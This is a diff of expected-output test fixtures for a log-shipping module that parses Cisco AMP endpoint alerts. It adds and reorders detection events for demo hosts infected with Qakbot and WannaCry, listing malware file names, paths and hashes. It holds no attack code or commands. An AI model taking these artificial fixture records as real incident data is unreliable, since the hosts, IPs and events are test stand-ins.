+ "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:05:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "24:78:d8:fd:c4:75" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6533241145273614338", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "24:78:d8:fd:c4:75" + ], + "cisco.amp.timestamp_nanoseconds": 619000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533241145273614000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Quarantined", + "host.name": "Demo_AMP_Threat_Quarantined", + "input.type": "log", + "log.offset": 9301, + "related.hash": [ + "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850" + ], + "related.hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2021-01-14T10:05:50.000Z", "cisco.amp.cloud_ioc.description": "The Windows Scripting Host (WScript.exe) was used to execute a file with a fake benign extension prior to a scripting extension. This is indicative of an attempt to conceal the malicious intent of the file and to trick the user into opening it.", 
@@ -1228,6 +1403,128 @@ "forwarded" ] }, + { + "@timestamp": "2021-01-13T15:36:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.0B965CA8AF-95.SBX.TG", + "cisco.amp.detection_id": "6411132837046517762", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 684000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411132837046518000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960", + "file.name": "11179468.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 38602, + "related.hash": [ + "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-13T15:36:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": 
"test_connector_guid", + "cisco.amp.detection": "W32.0B965CA8AF-95.SBX.TG", + "cisco.amp.detection_id": "6411132837046517761", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 682000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411132837046518000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.md5": "84b6f7be5370c1998886214790c6892b", + "file.hash.sha1": "5faebef3bb880489195e80e6656ccf442ff7123b", + "file.hash.sha256": "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960", + "file.name": "MspthrdHash.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 39856, + "related.hash": [ + "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960", + "84b6f7be5370c1998886214790c6892b", + "5faebef3bb880489195e80e6656ccf442ff7123b" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2021-01-13T10:37:33.000Z", "cisco.amp.computer.active": true, 
@@ -1771,6 +2068,59 @@ "forwarded" ] }, + { + "@timestamp": "2020-12-25T05:49:09.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6525520937264087041", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.timestamp_nanoseconds": 661000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6525520937264087000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "input.type": "log", + "log.offset": 53947, + "related.hash": [ + "edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9" + ], + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2020-12-25T05:30:44.000Z", "cisco.amp.computer.active": true, 
@@ -1844,6 +2194,59 @@ "forwarded" ] }, + { + "@timestamp": "2020-12-25T05:30:44.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6525516191325224961", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.timestamp_nanoseconds": 500000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6525516191325225000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "input.type": "log", + "log.offset": 56674, + "related.hash": [ + "f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117" + ], + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2020-12-25T05:30:41.000Z", "cisco.amp.cloud_ioc.description": "PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.", 
diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log-expected.json index fb066a1b3377..3fb89dbd6159 100644 --- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log-expected.json +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log-expected.json 
@@ -228,6 +228,75 @@ "forwarded" ] }, + { + "@timestamp": "2021-01-14T20:18:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.E4FCCBFA69-95.SBX.TG", + "cisco.amp.detection_id": "6412680266518626319", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 587000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412680266518626000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "file.name": "28242311.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 4969, + "process.hash.md5": "b5ede95ec8bc4ad6984758be42b152bd", + "process.hash.sha1": "f504774b72acfb23a46217aec9c6559fd7e4df64", + "process.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "process.name": "QuotaGroup.exe", + "process.pid": 7120, + "related.hash": [ + "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + 
"service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2021-01-14T20:18:05.000Z", "cisco.amp.computer.active": true, 
@@ -295,6 +364,73 @@ "forwarded" ] }, + { + "@timestamp": "2021-01-14T20:18:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.E4FCCBFA69-95.SBX.TG", + "cisco.amp.detection_id": "6412680266518626317", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 494000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412680266518626000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "file.name": "28242311.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 7890, + "process.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "process.name": "28242311.exe", + "process.pid": 4788, + "related.hash": [ + "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2021-01-14T20:18:05.000Z", 
"cisco.amp.computer.active": true, 
@@ -362,6 +498,112 @@ "forwarded" ] }, + { + "@timestamp": "2021-01-14T20:18:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412680266518626318", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 587000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412680266518626000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 10708, + "related.hash": [ + "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T20:18:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412680266518626316", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + 
"02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 494000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412680266518626000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 11817, + "related.hash": [ + "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2021-01-14T19:29:11.000Z", "cisco.amp.computer.active": true, @@ -1254,8 +1496,8 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", - "cisco.amp.detection_id": "6419303574240493595", + "cisco.amp.detection": "W32.2CA2D550E6-100.SBX.VIOC", + "cisco.amp.detection_id": "6419303574240493599", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.file.parent.disposition": "Malicious", @@ -1265,7 +1507,7 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 327000000, + "cisco.amp.timestamp_nanoseconds": 461000000, "event.action": "Threat Detected", "event.category": [ "file", 
@@ -1276,11 +1518,9 @@ "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "7bf2b57f2a205768755c07f238fb32cc", - "file.hash.sha1": "45356a9dd616ed7161a3b9192e2f318d0ab5ad10", - "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", - "file.name": "u.wnry", - "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry", + "file.hash.sha256": "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d", + "file.name": "taskse.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", @@ -1288,14 +1528,12 @@ "host.os.platform": "windows", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 34828, + "log.offset": 31923, "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", "process.name": "tasksche.exe", "process.pid": 2920, "related.hash": [ - "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", - "7bf2b57f2a205768755c07f238fb32cc", - "45356a9dd616ed7161a3b9192e2f318d0ab5ad10" + "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -1325,8 +1563,8 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", - "cisco.amp.detection_id": "6419303574240493594", + "cisco.amp.detection": "W32.4A468603FD.04426d77.auto.Talos", + "cisco.amp.detection_id": "6419303574240493597", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.file.parent.disposition": "Malicious", @@ -1336,7 +1574,7 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 313000000, + "cisco.amp.timestamp_nanoseconds": 430000000, "event.action": "Threat Detected", "event.category": [ "file", 
@@ -1347,11 +1585,9 @@ "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "7bf2b57f2a205768755c07f238fb32cc", - "file.hash.sha1": "45356a9dd616ed7161a3b9192e2f318d0ab5ad10", - "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", - "file.name": "@WanaDecryptor@.exe", - "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe", + "file.hash.sha256": "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79", + "file.name": "taskdl.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", @@ -1359,14 +1595,12 @@ "host.os.platform": "windows", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 36357, + "log.offset": 33372, "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", "process.name": "tasksche.exe", "process.pid": 2920, "related.hash": [ - "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", - "7bf2b57f2a205768755c07f238fb32cc", - "45356a9dd616ed7161a3b9192e2f318d0ab5ad10" + "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79" ], "related.hosts": [ "Demo_WannaCry_Ransomware" 
@@ -1396,18 +1630,21 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419303569945526290", - "cisco.amp.event_type_id": 553648143, + "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", + "cisco.amp.detection_id": "6419303574240493595", + "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 664000000, - "event.action": "Threat Quarantined", + "cisco.amp.timestamp_nanoseconds": 327000000, + "event.action": "Threat Detected", "event.category": [ + "file", "malware" ], "event.dataset": "cisco.amp", @@ -1415,14 +1652,26 @@ "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.sha256": "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d", + "file.hash.md5": "7bf2b57f2a205768755c07f238fb32cc", + "file.hash.sha1": "45356a9dd616ed7161a3b9192e2f318d0ab5ad10", + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "file.name": "u.wnry", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 40152, + "log.offset": 34828, + "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "process.name": "tasksche.exe", + "process.pid": 2920, "related.hash": [ - "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d" + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "7bf2b57f2a205768755c07f238fb32cc", + "45356a9dd616ed7161a3b9192e2f318d0ab5ad10" ], "related.hosts": [ "Demo_WannaCry_Ransomware" 
@@ -1431,6 +1680,9 @@ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -1449,18 +1701,21 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419303569945526289", - "cisco.amp.event_type_id": 553648143, + "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", + "cisco.amp.detection_id": "6419303574240493594", + "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 664000000, - "event.action": "Threat Quarantined", + "cisco.amp.timestamp_nanoseconds": 313000000, + "event.action": "Threat Detected", "event.category": [ + "file", "malware" ], "event.dataset": "cisco.amp", 
@@ -1468,14 +1723,26 @@ "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.sha256": "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79", + "file.hash.md5": "7bf2b57f2a205768755c07f238fb32cc", + "file.hash.sha1": "45356a9dd616ed7161a3b9192e2f318d0ab5ad10", + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "file.name": "@WanaDecryptor@.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 41272, + "log.offset": 36357, + "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "process.name": "tasksche.exe", + "process.pid": 2920, "related.hash": [ - "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79" + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "7bf2b57f2a205768755c07f238fb32cc", + "45356a9dd616ed7161a3b9192e2f318d0ab5ad10" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -1484,6 +1751,9 @@ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -1502,7 +1772,7 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419303565650558983", + "cisco.amp.detection_id": "6419303574240493595", "cisco.amp.event_type_id": 553648143, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ 
@@ -1521,14 +1791,14 @@ "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 42392, + "log.offset": 37912, "related.hash": [ - "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -1544,7 +1814,7 @@ ] }, { - "@timestamp": "2021-01-14T19:29:10.000Z", + "@timestamp": "2021-01-14T19:29:11.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -1555,10 +1825,8 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419303565650558982", - "cisco.amp.error.description": "Delete pending", - "cisco.amp.error.error_code": 3221225558, - "cisco.amp.event_type_id": 2164260880, + "cisco.amp.detection_id": "6419303574240493594", + "cisco.amp.event_type_id": 553648143, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" 
@@ -1566,24 +1834,24 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 782000000, - "event.action": "Quarantine Failure", + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Threat Quarantined", "event.category": [ "malware" ], "event.dataset": "cisco.amp", - "event.id": 6419303569945526000, + "event.id": 6419303574240494000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 43512, + "log.offset": 39032, "related.hash": [ - "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -1599,7 +1867,7 @@ ] }, { - "@timestamp": "2021-01-14T19:29:10.000Z", + "@timestamp": "2021-01-14T19:29:11.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -1610,10 +1878,8 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419303565650558980", - "cisco.amp.error.description": "Delete pending", - "cisco.amp.error.error_code": 3221225558, - "cisco.amp.event_type_id": 2164260880, + "cisco.amp.detection_id": "6419303569945526290", + "cisco.amp.event_type_id": 553648143, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" 
